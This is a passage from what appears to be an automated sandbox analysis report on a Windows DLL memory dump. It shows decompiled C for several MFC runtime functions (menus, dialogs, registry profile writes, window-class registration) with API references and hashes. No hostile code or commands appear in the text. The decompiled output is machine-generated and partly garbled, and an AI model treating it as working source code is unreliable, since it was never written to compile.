GlobalLock.KERNEL32 ref: 100164E8
CreateDialogIndirectParamA.USER32(?,?,?,10015E2B,00000000), ref: 10016517
DestroyWindow.USER32(00000000), ref: 10016591
GlobalUnlock.KERNEL32(?), ref: 100165A1
GlobalFree.KERNEL32 ref: 100165AA

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
String ID:
API String ID: 3003189058-0
Opcode ID: 8e962c6e188b07f6fbc1eea053ebbaa8c439c2391d91f4431a467a391b47a3d4
Instruction ID: f3ca1e0d4948761ec29b118d4ce710468c659ee3a562720183b6f562d053e99e
Opcode Fuzzy Hash: 8e962c6e188b07f6fbc1eea053ebbaa8c439c2391d91f4431a467a391b47a3d4
Instruction Fuzzy Hash: 92518B75A0024ADFCB04DFA4CD859EEBBB6EF48350F55052DF502AB291DB30EA81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 100075B0, Relevance: 9.1, APIs: 6, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E100075B0(intOrPtr __ecx, intOrPtr _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v32;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v108;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v144;
				intOrPtr _v148;
				signed int _t61;
				char* _t71;
				intOrPtr _t72;
				intOrPtr _t74;
				void* _t80;
				signed int _t111;

				_t61 =  *0x1006d940; // 0xc2bf211
				 *[fs:0x0] =  &_v16;
				_v144 = __ecx;
				__imp__#8( &_v40, _t61 ^ _t111,  *[fs:0x0], 0x10054cb8, 0xffffffff);
				_v8 = 0;
				_v44 = 0x80004005;
				_v20 = E10007240(_v144, 0x8b9);
				if((_v20 & 0x00000002) != 0 || (_v20 & 0x00000004) != 0) {
					if(E10007C40(_v144, 0x1005f584, 0x8b9, 0, 0,  &_v40) == 0 && (_v40 & 0x2000) != 0) {
						_v48 = _v32;
						_v52 = 0;
						_v56 = 0;
						_t71 =  &_v52;
						__imp__#20(_v48, 1, _t71);
						if(_t71 == 0) {
							_t72 = _v48;
							__imp__#19(_t72, 1,  &_v56);
							if(_t72 == 0) {
								_v60 = _v52;
								while(_v60 <= _v56) {
									_v64 = 0;
									_v8 = 1;
									_t74 = _v48;
									__imp__#25(_t74,  &_v60,  &_v64);
									if(_t74 == 0) {
										_v108 = _v64;
										_v148 = E10006C30( &_v68, _v108);
										_v136 = _v148;
										_v8 = 2;
										_v132 =  *((intOrPtr*)(_a4 + 8));
										E1001E870(_t80, _a4, _v132, _v136);
										_v8 = 1;
										E10001740( &_v68);
									}
									_v8 = 0;
									__imp__#6(_v64);
									_v60 = _v60 + 1;
								}
								_v44 = 0;
							}
						}
					}
				}
				if((_v40 & 0x0000ffff) == 0xa) {
					_v44 = _v32;
				}
				_v72 = _v44;
				_v8 = 0xffffffff;
				__imp__#9( &_v40);
				 *[fs:0x0] = _v16;
				return _v72;
			}

0x100075c7
0x100075d2
0x100075d8
0x100075e2
0x100075e8
0x100075ef
0x10007606
0x1000760f
0x1000763c
0x10007655
0x10007658
0x1000765f
0x10007666
0x10007670
0x10007678
0x10007684
0x10007688
0x10007690
0x10007699
0x100076a7
0x100076b3
0x100076ba
0x100076c6
0x100076ca
0x100076d2
0x100076d7
0x100076e6
0x100076f2
0x100076f8
0x10007702
0x10007713
0x10007718
0x1000771f
0x1000771f
0x10007724
0x1000772c
0x100076a4
0x100076a4
0x10007737
0x10007737
0x10007690
0x10007678
0x1000763c
0x10007745
0x1000774a
0x1000774a
0x10007750
0x10007753
0x1000775e
0x1000776a
0x10007775

APIs

VariantInit.OLEAUT32(?), ref: 100075E2
SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 10007670
SafeArrayGetUBound.OLEAUT32(?,00000001,00000000), ref: 10007688
SafeArrayGetElement.OLEAUT32(?,?,00000000), ref: 100076CA
SysFreeString.OLEAUT32(00000000), ref: 1000772C
VariantClear.OLEAUT32(?), ref: 1000775E

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$BoundVariant$ClearElementFreeInitString
String ID:
API String ID: 3736839919-0
Opcode ID: 4885c33c4bf6b823f3b53e28f2137db08c80d1b1b4e296de5e9a350ef76c065c
Instruction ID: 3205eb3a471dfcd5424218e17480de717273338446439c66d4c0d2e4a3598945
Opcode Fuzzy Hash: 4885c33c4bf6b823f3b53e28f2137db08c80d1b1b4e296de5e9a350ef76c065c
Instruction Fuzzy Hash: 0E510675E00258EFEB14CF94D884BDEBBB5FF48384F208159E519AB294DB75AA40CF60

Uniqueness

Uniqueness Score: -1.00%

Function 1003542D, Relevance: 9.1, APIs: 6, Instructions: 72
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E1003542D(void* __ecx) {
				struct HINSTANCE__* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HACCEL__* _t31;
				struct HINSTANCE__* _t33;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t41;
				void* _t56;

				_push(__ecx);
				_t56 = __ecx;
				_t48 = __ecx + 0x64;
				_t31 =  *(__ecx + 0x64);
				if( *((intOrPtr*)(_t31 - 0xc)) == 0) {
					_t31 = E100027C0(_t48,  *((intOrPtr*)(__ecx + 0x40)));
				}
				_t53 = LoadMenuA;
				_t45 = LoadAcceleratorsA;
				if( *(_t56 + 0x48) != 0) {
					_t60 =  *((intOrPtr*)(_t56 + 0x30));
					if( *((intOrPtr*)(_t56 + 0x30)) == 0) {
						_t41 =  *(E1001F108(LoadAcceleratorsA, LoadMenuA, _t56, _t60) + 0xc);
						_v8 = _t41;
						 *((intOrPtr*)(_t56 + 0x30)) = LoadMenuA(_t41,  *(_t56 + 0x48) & 0x0000ffff);
						_t31 = LoadAcceleratorsA(_v8,  *(_t56 + 0x48) & 0x0000ffff);
						 *(_t56 + 0x34) = _t31;
					}
				}
				if( *(_t56 + 0x44) != 0) {
					_t62 =  *((intOrPtr*)(_t56 + 0x38));
					if( *((intOrPtr*)(_t56 + 0x38)) == 0) {
						_t37 =  *(E1001F108(_t45, _t53, _t56, _t62) + 0xc);
						_v8 = _t37;
						 *((intOrPtr*)(_t56 + 0x38)) = LoadMenuA(_t37,  *(_t56 + 0x44) & 0x0000ffff);
						_t31 = LoadAcceleratorsA(_v8,  *(_t56 + 0x44) & 0x0000ffff);
						 *(_t56 + 0x3c) = _t31;
					}
				}
				if( *(_t56 + 0x4c) != 0) {
					_t64 =  *((intOrPtr*)(_t56 + 0x28));
					if( *((intOrPtr*)(_t56 + 0x28)) == 0) {
						_t33 =  *(E1001F108(_t45, _t53, _t56, _t64) + 0xc);
						_v8 = _t33;
						 *((intOrPtr*)(_t56 + 0x28)) = LoadMenuA(_t33,  *(_t56 + 0x4c) & 0x0000ffff);
						_t31 = LoadAcceleratorsA(_v8,  *(_t56 + 0x4c) & 0x0000ffff);
						 *(_t56 + 0x2c) = _t31;
					}
				}
				return _t31;
			}

0x10035432
0x10035435
0x10035437
0x1003543a
0x10035441
0x10035446
0x10035446
0x1003544f
0x10035455
0x1003545b
0x1003545d
0x10035461
0x1003546c
0x10035471
0x10035476
0x10035481
0x10035483
0x10035483
0x10035461
0x1003548a
0x1003548c
0x10035490
0x1003549b
0x100354a0
0x100354a5
0x100354b0
0x100354b2
0x100354b2
0x10035490
0x100354b9
0x100354bb
0x100354bf
0x100354ca
0x100354cf
0x100354d4
0x100354df
0x100354e1
0x100354e1
0x100354bf
0x100354e8

APIs

LoadMenuA.USER32 ref: 10035474
LoadAcceleratorsA.USER32 ref: 10035481
LoadMenuA.USER32 ref: 100354A3
LoadAcceleratorsA.USER32 ref: 100354B0
LoadMenuA.USER32 ref: 100354D2
LoadAcceleratorsA.USER32 ref: 100354DF

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Load$AcceleratorsMenu
String ID:
API String ID: 144087665-0
Opcode ID: 1d6b0829c204abca25f3912d8733450e70367e36f722c6c6f691fbde4fc1a02a
Instruction ID: 974ef39df6d3fb86032415cc79c175e1b294b82803502cbc7b39949cc4e74dd0
Opcode Fuzzy Hash: 1d6b0829c204abca25f3912d8733450e70367e36f722c6c6f691fbde4fc1a02a
Instruction Fuzzy Hash: 4C212A70410724EED765DF66C985A6AF7F8FF08226F10481EE58286960D776F880DB20

Uniqueness

Uniqueness Score: -1.00%

Function 1001B59C, Relevance: 9.1, APIs: 6, Instructions: 58
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001B59C(intOrPtr __ecx, CHAR* _a4, char* _a8, char* _a12) {
				long _t21;
				void* _t28;

				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					return WritePrivateProfileStringA(_a4, _a8, _a12,  *(__ecx + 0x68));
				}
				if(_a8 != 0) {
					_t28 = E1001B460(__ecx, _a4);
					if(_a12 != 0) {
						if(_t28 == 0) {
							L3:
							return 0;
						}
						_t21 = RegSetValueExA(_t28, _a8, 0, 1, _a12, lstrlenA(_a12) + 1);
						L10:
						RegCloseKey(_t28);
						return 0 | _t21 == 0x00000000;
					}
					if(_t28 == 0) {
						goto L3;
					}
					_t21 = RegDeleteValueA(_t28, _a8);
					goto L10;
				}
				_t28 = E1001B3CD(__ecx);
				if(_t28 != 0) {
					_t21 = RegDeleteKeyA(_t28, _a4);
					goto L10;
				}
				goto L3;
			}

0x1001b5a7
0x00000000
0x1001b628
0x1001b5ad
0x1001b5d6
0x1001b5d8
0x1001b5ec
0x1001b5ba
0x00000000
0x1001b5ba
0x1001b604
0x1001b60a
0x1001b60d
0x00000000
0x1001b617
0x1001b5dc
0x00000000
0x00000000
0x1001b5e2
0x00000000
0x1001b5e2
0x1001b5b4
0x1001b5b8
0x1001b5c2
0x00000000
0x1001b5c2
0x00000000

APIs

RegDeleteKeyA.ADVAPI32(00000000,?), ref: 1001B5C2
RegDeleteValueA.ADVAPI32(00000000,00000000,?), ref: 1001B5E2
RegCloseKey.ADVAPI32(00000000), ref: 1001B60D

Part of subcall function 1001B3CD: RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,00000000,00000000,?,?,00000004,100036E9), ref: 1001B3FD
Part of subcall function 1001B3CD: RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,00000000,0002001F,00000000,00000000,00000004,?,?,00000004,100036E9), ref: 1001B420
Part of subcall function 1001B3CD: RegCreateKeyExA.ADVAPI32(00000000,00000004,00000000,00000000,00000000,0002001F,00000000,100036E9,00000004,?,?,00000004,100036E9), ref: 1001B43C
Part of subcall function 1001B3CD: RegCloseKey.ADVAPI32(?,?,?,00000004,100036E9), ref: 1001B44C
Part of subcall function 1001B3CD: RegCloseKey.ADVAPI32(00000000,?,?,00000004,100036E9), ref: 1001B456

WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1001B628

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$CreateDelete$OpenPrivateProfileStringValueWrite
String ID:
API String ID: 1886894508-0
Opcode ID: 7135c1855d5dd6efe6fc4b813ca71aa1a53d98f77b4adbd5ec60c156946e34e1
Instruction ID: aa630ce14d887df1dea7b9e35acb3d84a80ecb5155edde5e4348c9ee956b7255
Opcode Fuzzy Hash: 7135c1855d5dd6efe6fc4b813ca71aa1a53d98f77b4adbd5ec60c156946e34e1
Instruction Fuzzy Hash: CD115E32401E29FBDB125F60CD08B9F3BA6EF18391F114510FD155E160CB35C9919B90

Uniqueness

Uniqueness Score: -1.00%

Function 10027202, Relevance: 9.0, APIs: 6, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E10027202(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t12 = GetWindow();
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0xffff && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_push(2);
					_push(_t21);
				}
				return _t12;
			}

0x10027213
0x1002721f
0x10027221
0x10027266
0x10027266
0x10027268
0x1002726c
0x00000000
0x00000000
0x10027232
0x10027249
0x1002724f
0x10027261
0x00000000
0x10027274
0x10027261
0x10027263
0x10027265
0x10027265
0x10027271

APIs

ClientToScreen.USER32(?,?), ref: 10027213
GetDlgCtrlID.USER32 ref: 10027227
GetWindowLongA.USER32 ref: 10027237
GetWindowRect.USER32 ref: 10027249
PtInRect.USER32(?,?,?), ref: 10027259
GetWindow.USER32(?,00000005), ref: 10027266

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 6cf795415097cc7c261ca96115902a4f62f19edf8c36c498265d63942d5a4317
Instruction ID: 7127bf215b39cf963b918c73e05f9090d1393867ed25ffa81a93b5a3313dcc9e
Opcode Fuzzy Hash: 6cf795415097cc7c261ca96115902a4f62f19edf8c36c498265d63942d5a4317
Instruction Fuzzy Hash: DE01AD32900539FBEB229F54EC48EAE3BACFF48350F800225F919D61A0E730DA058B90

Uniqueness

Uniqueness Score: -1.00%

Function 10035320, Relevance: 9.0, APIs: 6, Instructions: 42
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E10035320(void* __ecx) {
				void* _t13;
				struct HMENU__* _t14;
				void* _t15;
				struct HMENU__* _t16;
				void* _t17;
				intOrPtr _t19;
				void* _t32;
				void* _t33;

				_t25 = __ecx;
				_t32 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x28)) != 0) {
					__eax = DestroyMenu(__eax);
				}
				_t13 =  *(_t32 + 0x2c);
				if(_t13 != 0) {
					FreeResource(_t13);
				}
				_t14 =  *(_t32 + 0x30);
				if(_t14 != 0) {
					DestroyMenu(_t14);
				}
				_t15 =  *(_t32 + 0x34);
				if(_t15 != 0) {
					FreeResource(_t15);
				}
				_t16 =  *(_t32 + 0x38);
				if(_t16 != 0) {
					DestroyMenu(_t16);
				}
				_t17 =  *(_t32 + 0x3c);
				if(_t17 != 0) {
					FreeResource(_t17);
				}
				E10001020( *((intOrPtr*)(_t32 + 0x64)) - 0x10);
				_t25 = _t32;
				_pop(_t32);
				_push(_t32);
				_t33 = _t25;
				_t19 =  *((intOrPtr*)(_t33 + 0x10));
				if(_t19 != 0) {
					_t19 =  *((intOrPtr*)(_t19 + 0x1c))();
				}
				 *(_t33 + 0x1c) =  *(_t33 + 0x1c) & 0x00000000;
				return _t19;
			}

0x10035320
0x10035323
0x10035331
0x10035334
0x10035334
0x10035336
0x1003533b
0x1003533e
0x1003533e
0x10035344
0x10035349
0x1003534c
0x1003534c
0x1003534e
0x10035353
0x10035356
0x10035356
0x1003535c
0x10035361
0x10035364
0x10035364
0x10035366
0x1003536b
0x1003536e
0x1003536e
0x1003537a
0x10035380
0x10035382
0x10009714
0x10009715
0x1000971a
0x1000971e
0x10009720
0x10009720
0x10009723
0x10009728

APIs

DestroyMenu.USER32(?,?,?,1001A4FF), ref: 10035334
FreeResource.KERNEL32(?,?,?,1001A4FF), ref: 1003533E
DestroyMenu.USER32(?,?,?,1001A4FF), ref: 1003534C
FreeResource.KERNEL32(?,?,?,1001A4FF), ref: 10035356
DestroyMenu.USER32(?,?,?,1001A4FF), ref: 10035364
FreeResource.KERNEL32(?,?,?,1001A4FF), ref: 1003536E

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: DestroyFreeMenuResource
String ID:
API String ID: 2790856715-0
Opcode ID: 2c4ae84758e136898b4d0523bb71b5f275c1d0d1842579d1546045f48be3742a
Instruction ID: 25df8703339b3e845991c9960872ff9e191a055b3a304696e6b1b7bc633a1771
Opcode Fuzzy Hash: 2c4ae84758e136898b4d0523bb71b5f275c1d0d1842579d1546045f48be3742a
Instruction Fuzzy Hash: 29F0E1717007115FDB61DF7A9D88A5BF3ECFF486C27050829E846D7A60DAB1F9008A60

Uniqueness

Uniqueness Score: -1.00%

Function 10011D0D, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 244
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E10011D0D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				signed int _v56;
				void* __ebp;
				intOrPtr _t127;
				void* _t133;
				intOrPtr _t135;
				signed int _t145;
				signed int _t150;
				signed int _t183;
				signed int _t185;
				signed int _t187;
				signed int _t189;
				signed int _t191;
				signed int _t195;
				void* _t198;
				intOrPtr _t199;
				signed int _t209;

				_t198 = __ecx;
				_t127 = E1001F108(__ebx, __edi, __esi, __eflags);
				_v8 = _t127;
				_t3 =  &_a4;
				 *_t3 = _a4 &  !( *(_t127 + 0x18));
				if( *_t3 == 0) {
					return 1;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 0;
				E10041630(0,  &_v56, 0, 0x28);
				_v52 = DefWindowProcA;
				_t133 = E1001F108(__ebx, 0, 0, __eflags);
				__eflags = _a4 & 0x00000001;
				_v40 =  *((intOrPtr*)(_t133 + 8));
				_t135 =  *0x10094560; // 0x10003
				_t195 = 8;
				_v32 = _t135;
				_v16 = _t195;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0xb;
					_v20 = "AfxWnd90s";
					_t191 = E10011A0C(_t195, _t198, 0, 0, __eflags);
					__eflags = _t191;
					if(_t191 != 0) {
						_t209 = 1;
						__eflags = 1;
					}
				}
				__eflags = _a4 & 0x00000020;
				if(__eflags != 0) {
					_v56 = _v56 | 0x0000008b;
					_push( &_v56);
					_v20 = "AfxOleControl90s";
					_t189 = E10011A0C(_t195, _t198, 0, _t209, __eflags);
					__eflags = _t189;
					if(_t189 != 0) {
						_t209 = _t209 | 0x00000020;
						__eflags = _t209;
					}
				}
				__eflags = _a4 & 0x00000002;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0;
					_v20 = "AfxControlBar90s";
					_v28 = 0x10;
					_t187 = E10011A0C(_t195, _t198, 0, _t209, __eflags);
					__eflags = _t187;
					if(_t187 != 0) {
						_t209 = _t209 | 0x00000002;
						__eflags = _t209;
					}
				}
				__eflags = _a4 & 0x00000004;
				if(__eflags != 0) {
					_v56 = _t195;
					_v28 = 0;
					_t185 = E10011CC9(_t198, __eflags,  &_v56, "AfxMDIFrame90s", 0x7a01);
					__eflags = _t185;
					if(_t185 != 0) {
						_t209 = _t209 | 0x00000004;
						__eflags = _t209;
					}
				}
				__eflags = _a4 & _t195;
				if(__eflags != 0) {
					_v56 = 0xb;
					_v28 = 6;
					_t183 = E10011CC9(_t198, __eflags,  &_v56, "AfxFrameOrView90s", 0x7a02);
					__eflags = _t183;
					if(_t183 != 0) {
						_t209 = _t209 | _t195;
						__eflags = _t209;
					}
				}
				__eflags = _a4 & 0x00000010;
				if(__eflags != 0) {
					_v12 = 0xff;
					_t209 = _t209 | E1000F2DB(_t195, _t198, _t209, __eflags,  &_v16, 0x3fc0);
					_t48 =  &_a4;
					 *_t48 = _a4 & 0xffffc03f;
					__eflags =  *_t48;
				}
				__eflags = _a4 & 0x00000040;
				if(__eflags != 0) {
					_v12 = 0x10;
					_t209 = _t209 | E1000F2DB(_t195, _t198, _t209, __eflags,  &_v16, 0x40);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00000080;
				if(__eflags != 0) {
					_v12 = 2;
					_t209 = _t209 | E1000F2DB(_t195, _t198, _t209, __eflags,  &_v16, 0x80);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00000100;
				if(__eflags != 0) {
					_v12 = _t195;
					_t209 = _t209 | E1000F2DB(_t195, _t198, _t209, __eflags,  &_v16, 0x100);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00000200;
				if(__eflags != 0) {
					_v12 = 0x20;
					_t209 = _t209 | E1000F2DB(_t195, _t198, _t209, __eflags,  &_v16, 0x200);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00000400;
				if(__eflags != 0) {
					_v12 = 1;
					_t209 = _t209 | E1000F2DB(0x400, _t198, _t209, __eflags,  &_v16, 0x400);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00000800;
				if(__eflags != 0) {
					_v12 = 0x40;
					_t209 = _t209 | E1000F2DB(0x400, _t198, _t209, __eflags,  &_v16, 0x800);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00001000;
				if(__eflags != 0) {
					_v12 = 4;
					_t209 = _t209 | E1000F2DB(0x400, _t198, _t209, __eflags,  &_v16, 0x1000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00002000;
				if(__eflags != 0) {
					_v12 = 0x80;
					_t209 = _t209 | E1000F2DB(0x400, _t198, _t209, __eflags,  &_v16, 0x2000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00004000;
				if(__eflags != 0) {
					_v12 = 0x800;
					_t209 = _t209 | E1000F2DB(0x400, _t198, _t209, __eflags,  &_v16, 0x4000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00008000;
				if(__eflags != 0) {
					_v12 = 0x400;
					_t209 = _t209 | E1000F2DB(0x400, _t198, _t209, __eflags,  &_v16, 0x8000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00010000;
				if(__eflags != 0) {
					_v12 = 0x200;
					_t209 = _t209 | E1000F2DB(0x400, _t198, _t209, __eflags,  &_v16, 0x10000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00020000;
				if(__eflags != 0) {
					_v12 = 0x100;
					_t209 = _t209 | E1000F2DB(0x400, _t198, _t209, __eflags,  &_v16, 0x20000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00040000;
				if(__eflags != 0) {
					_v12 = 0x8000;
					_t209 = _t209 | E1000F2DB(0x400, _t198, _t209, __eflags,  &_v16, 0x40000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00080000;
				if(__eflags != 0) {
					_v12 = 0x1000;
					_t209 = _t209 | E1000F2DB(0x400, _t198, _t209, __eflags,  &_v16, 0x80000);
					__eflags = _t209;
				}
				_t199 = _v8;
				 *(_t199 + 0x18) =  *(_t199 + 0x18) | _t209;
				_t145 =  *(_t199 + 0x18);
				__eflags = (_t145 & 0x00003fc0) - 0x3fc0;
				if((_t145 & 0x00003fc0) == 0x3fc0) {
					 *(_t199 + 0x18) = _t145 | 0x00000010;
					_t209 = _t209 | 0x00000010;
					__eflags = _t209;
				}
				asm("sbb eax, eax");
				_t150 =  ~((_t209 & _a4) - _a4) + 1;
				__eflags = _t150;
				return _t150;
			}

0x10011d0d
0x10011d15
0x10011d1a
0x10011d22
0x10011d22
0x10011d25
0x00000000
0x10011d29
0x10011d2f
0x10011d30
0x10011d31
0x10011d3b
0x10011d3d
0x10011d4a
0x10011d4d
0x10011d52
0x10011d5b
0x10011d5e
0x10011d63
0x10011d64
0x10011d67
0x10011d6a
0x10011d6f
0x10011d70
0x10011d77
0x10011d7e
0x10011d83
0x10011d85
0x10011d87
0x10011d87
0x10011d87
0x10011d85
0x10011d88
0x10011d8c
0x10011d8e
0x10011d98
0x10011d99
0x10011da0
0x10011da5
0x10011da7
0x10011da9
0x10011da9
0x10011da9
0x10011da7
0x10011dac
0x10011db0
0x10011db5
0x10011db6
0x10011db9
0x10011dc0
0x10011dc7
0x10011dcc
0x10011dce
0x10011dd0
0x10011dd0
0x10011dd0
0x10011dce
0x10011dd3
0x10011dd7
0x10011de7
0x10011dea
0x10011ded
0x10011df2
0x10011df4
0x10011df6
0x10011df6
0x10011df6
0x10011df4
0x10011df9
0x10011dfc
0x10011e0c
0x10011e13
0x10011e1a
0x10011e1f
0x10011e21
0x10011e23
0x10011e23
0x10011e23
0x10011e21
0x10011e25
0x10011e29
0x10011e34
0x10011e40
0x10011e42
0x10011e42
0x10011e42
0x10011e42
0x10011e49
0x10011e4d
0x10011e55
0x10011e61
0x10011e61
0x10011e61
0x10011e63
0x10011e67
0x10011e72
0x10011e7e
0x10011e7e
0x10011e7e
0x10011e85
0x10011e88
0x10011e8f
0x10011e97
0x10011e97
0x10011e97
0x10011e9e
0x10011ea1
0x10011ea8
0x10011eb4
0x10011eb4
0x10011eb4
0x10011ebb
0x10011ebe
0x10011ec5
0x10011ed1
0x10011ed1
0x10011ed1
0x10011ed8
0x10011edb
0x10011ee2
0x10011eee
0x10011eee
0x10011eee
0x10011ef5
0x10011ef8
0x10011eff
0x10011f0b
0x10011f0b
0x10011f0b
0x10011f12
0x10011f15
0x10011f1c
0x10011f28
0x10011f28
0x10011f28
0x10011f2f
0x10011f32
0x10011f39
0x10011f41
0x10011f41
0x10011f41
0x10011f48
0x10011f4b
0x10011f52
0x10011f5a
0x10011f5a
0x10011f5a
0x10011f61
0x10011f64
0x10011f6b
0x10011f77
0x10011f77
0x10011f77
0x10011f7e
0x10011f81
0x10011f88
0x10011f94
0x10011f94
0x10011f94
0x10011f9b
0x10011f9e
0x10011fa5
0x10011fad
0x10011fad
0x10011fad
0x10011fb4
0x10011fb7
0x10011fbe
0x10011fca
0x10011fca
0x10011fca
0x10011fcc
0x10011fcf
0x10011fd2
0x10011fde
0x10011fe0
0x10011fe5
0x10011fe8
0x10011fe8
0x10011fe8
0x10011ff7
0x10011ff9
0x10011ff9
0x00000000

APIs

_memset.LIBCMT ref: 10011D3D

Strings

@, xrefs: 10011EE2
AfxMDIFrame90s, xrefs: 10011DDE
AfxFrameOrView90s, xrefs: 10011E03
@, xrefs: 10011E49

Memory Dump Source

